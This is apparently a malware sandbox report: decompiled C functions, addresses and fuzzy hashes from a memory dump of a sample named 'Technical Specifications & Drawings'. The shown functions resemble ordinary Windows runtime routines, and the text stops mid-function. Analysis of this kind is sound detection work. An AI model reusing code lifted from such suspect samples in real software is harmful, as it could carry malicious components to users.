                                                  0x01826ab9
                                                  0x01826abb
                                                  0x01826abe
                                                  0x01826ac5
                                                  0x01826ac5
                                                  0x01826aaf
                                                  0x01826a40
                                                  0x01826a26
                                                  0x018269fe
                                                  0x01826ace
                                                  0x01826ad0
                                                  0x01826ad3
                                                  0x01826ad8
                                                  0x01826adf
                                                  0x01826adf
                                                  0x01826ae8
                                                  0x01826aef
                                                  0x01826aef
                                                  0x01826af9
                                                  0x01826b06

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b842a7504118338c91a38848aa34e92271a26847a3edf873dc1580ee452b619
                                                  • Instruction ID: c12b94a9512190dac0bdbfbf6d02dc3527a83f7cd188b27d370e4ea717a9c7ba
                                                  • Opcode Fuzzy Hash: 2b842a7504118338c91a38848aa34e92271a26847a3edf873dc1580ee452b619
                                                  • Instruction Fuzzy Hash: 574189B1D00219AFDB21DFA9C944BEEFBF4EF48704F14812AE915E3240EB309A45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A5210 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E017A5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E017A52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017E95D0();
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E017BEB70(_t54, 0x18979a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E017E95D0();
								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E017BEB70(_t54, 0x18979a0);
						}
						return _t52;
					}
					L5:
					_t33 = E017EF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E017BEB70(_t54, 0x18979a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017E95D0();
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                  0x017a5220
                                                  0x017a5224
                                                  0x01800d13
                                                  0x01800d16
                                                  0x01800d19
                                                  0x017a522a
                                                  0x017a522a
                                                  0x017a522d
                                                  0x017a522d
                                                  0x017a5231
                                                  0x017a5235
                                                  0x017a5239
                                                  0x01800d5c
                                                  0x01800d62
                                                  0x00000000
                                                  0x00000000
                                                  0x01800d6a
                                                  0x01800d7b
                                                  0x01800d7f
                                                  0x01800d81
                                                  0x01800d84
                                                  0x01800d95
                                                  0x01800d95
                                                  0x01800d6c
                                                  0x01800d71
                                                  0x01800d71
                                                  0x01800d9a
                                                  0x00000000
                                                  0x017a524a
                                                  0x017a524a
                                                  0x017a5250
                                                  0x01800d24
                                                  0x01800d35
                                                  0x01800d39
                                                  0x01800d3b
                                                  0x01800d3e
                                                  0x01800d50
                                                  0x01800d50
                                                  0x01800d26
                                                  0x01800d2b
                                                  0x01800d2b
                                                  0x00000000
                                                  0x01800d55
                                                  0x017a5256
                                                  0x017a525b
                                                  0x017a5265
                                                  0x01800da7
                                                  0x017a526b
                                                  0x017a526e
                                                  0x017a5272
                                                  0x01800db1
                                                  0x01800db4
                                                  0x01800dc5
                                                  0x01800dc5
                                                  0x017a5272
                                                  0x017a5278
                                                  0x017a527e
                                                  0x017a528a
                                                  0x017a528c
                                                  0x017a528d
                                                  0x00000000
                                                  0x017a5280
                                                  0x017a5282
                                                  0x017a5288
                                                  0x017a529f
                                                  0x017a5292
                                                  0x00000000
                                                  0x017a5292
                                                  0x00000000
                                                  0x017a5288
                                                  0x017a527e

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6d61315df4252135b77c5bab3c835ff77d9d04b729806edf2adc2b799c8fa2d
                                                  • Instruction ID: 0408229fda9cd3b6a9d9894817198c92de0ffd74ef45fc869dc557dbee3b9c5e
                                                  • Opcode Fuzzy Hash: f6d61315df4252135b77c5bab3c835ff77d9d04b729806edf2adc2b799c8fa2d
                                                  • Instruction Fuzzy Hash: 0B314831255705EBC7269B18CC84F6AF7A5FF607A0F104729F9598B2D4DB30EA00CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E3D43 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E017B7B60(0, _t61, 0x17811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E017B7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L017C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                  0x017e3d4c
                                                  0x017e3d50
                                                  0x017e3d55
                                                  0x017e3d5e
                                                  0x0181e79a
                                                  0x00000000
                                                  0x0181e79a
                                                  0x017e3d68
                                                  0x0181e789
                                                  0x017e3d9d
                                                  0x017e3da3
                                                  0x017e3daf
                                                  0x017e3db5
                                                  0x017e3dbc
                                                  0x017e3dc4
                                                  0x017e3dc9
                                                  0x017e3dce
                                                  0x0181e7ae
                                                  0x0181e7ae
                                                  0x017e3dde
                                                  0x017e3de2
                                                  0x017e3de7
                                                  0x017e3e0d
                                                  0x017e3e13
                                                  0x017e3e16
                                                  0x017e3e1e
                                                  0x017e3e25
                                                  0x017e3e28
                                                  0x00000000
                                                  0x00000000
                                                  0x017e3e2a
                                                  0x017e3e2f
                                                  0x017e3e37
                                                  0x017e3e37
                                                  0x00000000
                                                  0x017e3e37
                                                  0x017e3e31
                                                  0x00000000
                                                  0x017e3e31
                                                  0x017e3e20
                                                  0x017e3e20
                                                  0x017e3e35
                                                  0x00000000
                                                  0x017e3de9
                                                  0x017e3de9
                                                  0x017e3de9
                                                  0x017e3dee
                                                  0x017e3dfd
                                                  0x017e3dff
                                                  0x017e3e02
                                                  0x017e3e05
                                                  0x017e3e05
                                                  0x00000000
                                                  0x017e3df0
                                                  0x017e3de7
                                                  0x0181e78f
                                                  0x0181e794
                                                  0x017e3d79
                                                  0x017e3d84
                                                  0x017e3d89
                                                  0x017e3d8e
                                                  0x00000000
                                                  0x0181e7a4
                                                  0x017e3d96
                                                  0x017e3d9a
                                                  0x00000000
                                                  0x017e3d9a
                                                  0x00000000
                                                  0x0181e794
                                                  0x017e3d6e
                                                  0x017e3d73
                                                  0x00000000
                                                  0x0181e7b5
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea1cc02340a1fdb41d8475610fa7e32546413a1637daa81de9b3b096f81328a1
                                                  • Instruction ID: 3647abce76d18b4c6106c4890405345ed3bbf8889b64ab6691bc15c6eaec3c7b
                                                  • Opcode Fuzzy Hash: ea1cc02340a1fdb41d8475610fa7e32546413a1637daa81de9b3b096f81328a1
                                                  • Instruction Fuzzy Hash: FD319E32A006159BD729CF2DC449A6AFBF5FF89710B0584AEE945CB354E731D880C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DA61C Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E017DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1880220);
				E017FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1897b9c; // 0x0
				_t55 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E017FD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1897b10 =  *0x1897b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x189536c; // 0x77575368
					if( *_t51 != 0x1895368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1895368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x189536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E017DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                  0x017da61c
                                                  0x017da61e
                                                  0x017da623
                                                  0x017da628
                                                  0x017da62b
                                                  0x017da62d
                                                  0x017da648
                                                  0x017da64a
                                                  0x017da64f
                                                  0x01819b44
                                                  0x017da6ec
                                                  0x017da6f1
                                                  0x017da6f1
                                                  0x017da655
                                                  0x017da657
                                                  0x017da65a
                                                  0x017da65d
                                                  0x017da662
                                                  0x017da663
                                                  0x017da667
                                                  0x017da668
                                                  0x017da66d
                                                  0x017da706
                                                  0x017da706
                                                  0x01819bda
                                                  0x01819be6
                                                  0x01819beb
                                                  0x00000000
                                                  0x01819beb
                                                  0x017da679
                                                  0x01819b7a
                                                  0x00000000
                                                  0x01819b7a
                                                  0x017da683
                                                  0x017da6f4
                                                  0x017da6f7
                                                  0x017da6f9
                                                  0x017da6fd
                                                  0x017da6a0
                                                  0x017da6a0
                                                  0x017da6ad
                                                  0x017da6af
                                                  0x017da6b4
                                                  0x01819ba7
                                                  0x01819bac
                                                  0x00000000
                                                  0x00000000
                                                  0x01819bc6
                                                  0x01819bce
                                                  0x01819bd1
                                                  0x01819bd3
                                                  0x01819bd3
                                                  0x00000000
                                                  0x01819bd1
                                                  0x017da6bd
                                                  0x017da6c3
                                                  0x017da6c6
                                                  0x017da6d2
                                                  0x017da701
                                                  0x017da704
                                                  0x00000000
                                                  0x017da704
                                                  0x017da6d4
                                                  0x017da6d6
                                                  0x017da6d9
                                                  0x017da6db
                                                  0x017da6e1
                                                  0x017da6e6
                                                  0x017da6e8
                                                  0x017da6e8
                                                  0x017da6ea
                                                  0x00000000
                                                  0x017da6ea
                                                  0x017da688
                                                  0x017da692
                                                  0x017da694
                                                  0x017da699
                                                  0x00000000
                                                  0x00000000
                                                  0x017da69d
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f536817d6eccad8f0af131d6f7deb9d50f8262b3f2bb787ccde88b3ce5c5e322
                                                  • Instruction ID: 01345e2a947e30dbcddc8badf8c589b1baaa33940d31685c15b6d6374b984c02
                                                  • Opcode Fuzzy Hash: f536817d6eccad8f0af131d6f7deb9d50f8262b3f2bb787ccde88b3ce5c5e322
                                                  • Instruction Fuzzy Hash: 48416AB5A00219DFCB15CF68C890B99BBF5FB89314F1980ADE905EB348C775AA01CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CC182 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E017CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E017C7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01878D34(_v8, _t80);
					}
					E017C2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E017BFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01878833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E017BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E017EB180();
						if(_a4 != 0) {
							E017C2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E017CBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E017CBB2D(_t16, _t15);
						E017CB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E017BFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E017BFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E017BFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                  0x017cc18d
                                                  0x017cc18f
                                                  0x017cc191
                                                  0x017cc19b
                                                  0x017cc1a0
                                                  0x017cc1d4
                                                  0x017cc1de
                                                  0x01812d6e
                                                  0x017cc1e4
                                                  0x017cc1e4
                                                  0x017cc1e4
                                                  0x017cc1ec
                                                  0x01812d7d
                                                  0x01812d7d
                                                  0x017cc1f3
                                                  0x017cc1ff
                                                  0x01812d88
                                                  0x01812d8d
                                                  0x01812d94
                                                  0x01812d94
                                                  0x01812d9f
                                                  0x01812da4
                                                  0x01812dab
                                                  0x01812db0
                                                  0x01812db2
                                                  0x01812db3
                                                  0x01812db4
                                                  0x01812dbc
                                                  0x01812dc3
                                                  0x01812dc3
                                                  0x017cc205
                                                  0x017cc205
                                                  0x017cc208
                                                  0x017cc20e
                                                  0x017cc211
                                                  0x017cc216
                                                  0x017cc219
                                                  0x017cc21f
                                                  0x017cc222
                                                  0x017cc22c
                                                  0x017cc234
                                                  0x017cc23a
                                                  0x017cc23f
                                                  0x017cc245
                                                  0x017cc24b
                                                  0x017cc251
                                                  0x017cc25a
                                                  0x017cc276
                                                  0x017cc27d
                                                  0x017cc27d
                                                  0x017cc25c
                                                  0x017cc25c
                                                  0x00000000
                                                  0x017cc25e
                                                  0x017cc1a4
                                                  0x017cc1aa
                                                  0x017cc1b3
                                                  0x017cc265
                                                  0x017cc26c
                                                  0x017cc26c
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction ID: 651427cf4f17ac4ee1b52836db1c89d57c7ecf04e3144d98658f29d459441438
                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                  • Instruction Fuzzy Hash: FD3168B2A0558BBFD706EBB8C884BE9FB55BF52700F04415ED51C87206CB34AA05CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01827016 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E01827016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x189d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01826B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01826B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E017C7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E017E9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E017EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L017C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                  0x01827016
                                                  0x0182701e
                                                  0x0182702b
                                                  0x01827033
                                                  0x01827037
                                                  0x0182703c
                                                  0x0182703e
                                                  0x01827041
                                                  0x01827045
                                                  0x0182704a
                                                  0x01827050
                                                  0x01827055
                                                  0x0182705a
                                                  0x01827062
                                                  0x01827062
                                                  0x0182705a
                                                  0x01827064
                                                  0x01827064
                                                  0x01827067
                                                  0x01827071
                                                  0x01827096
                                                  0x0182709b
                                                  0x018270a2
                                                  0x018270a6
                                                  0x018270a7
                                                  0x018270ad
                                                  0x018270b3
                                                  0x018270b6
                                                  0x018270bb
                                                  0x018270c3
                                                  0x018270c3
                                                  0x018270c6
                                                  0x018270cd
                                                  0x018270dd
                                                  0x018270e0
                                                  0x018270e2
                                                  0x018270e2
                                                  0x018270ee
                                                  0x01827101
                                                  0x018270f0
                                                  0x018270f9
                                                  0x018270f9
                                                  0x0182710a
                                                  0x0182710e
                                                  0x01827112
                                                  0x01827117
                                                  0x01827118
                                                  0x01827118
                                                  0x018270bb
                                                  0x0182711d
                                                  0x01827123
                                                  0x01827131
                                                  0x01827131
                                                  0x01827136
                                                  0x0182713d
                                                  0x0182713e
                                                  0x0182713f
                                                  0x0182714a
                                                  0x0182714a
                                                  0x01827084
                                                  0x01827088
                                                  0x00000000
                                                  0x0182708e
                                                  0x0182708e
                                                  0x01827092
                                                  0x00000000
                                                  0x01827092

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cd019f7c27100d48834f91ce61dec8013d4e7cbd1c30d42a99cb818f3b62bc1
                                                  • Instruction ID: c4a826e46cb29eb0acf4a26bcfe4f48d75d8c8f25ffc7a56e093a568fc29b8f1
                                                  • Opcode Fuzzy Hash: 8cd019f7c27100d48834f91ce61dec8013d4e7cbd1c30d42a99cb818f3b62bc1
                                                  • Instruction Fuzzy Hash: 3131E4726047619BC321DF2DC840A6AB7E5BF98700F144A2DF995C7694E730EA44CBA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DA70E Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E017DA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1897b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1897b10 = 8;
					 *0x1897b14 = 0x1897b0c;
					 *0x1897b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E017DA990(0x1897b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
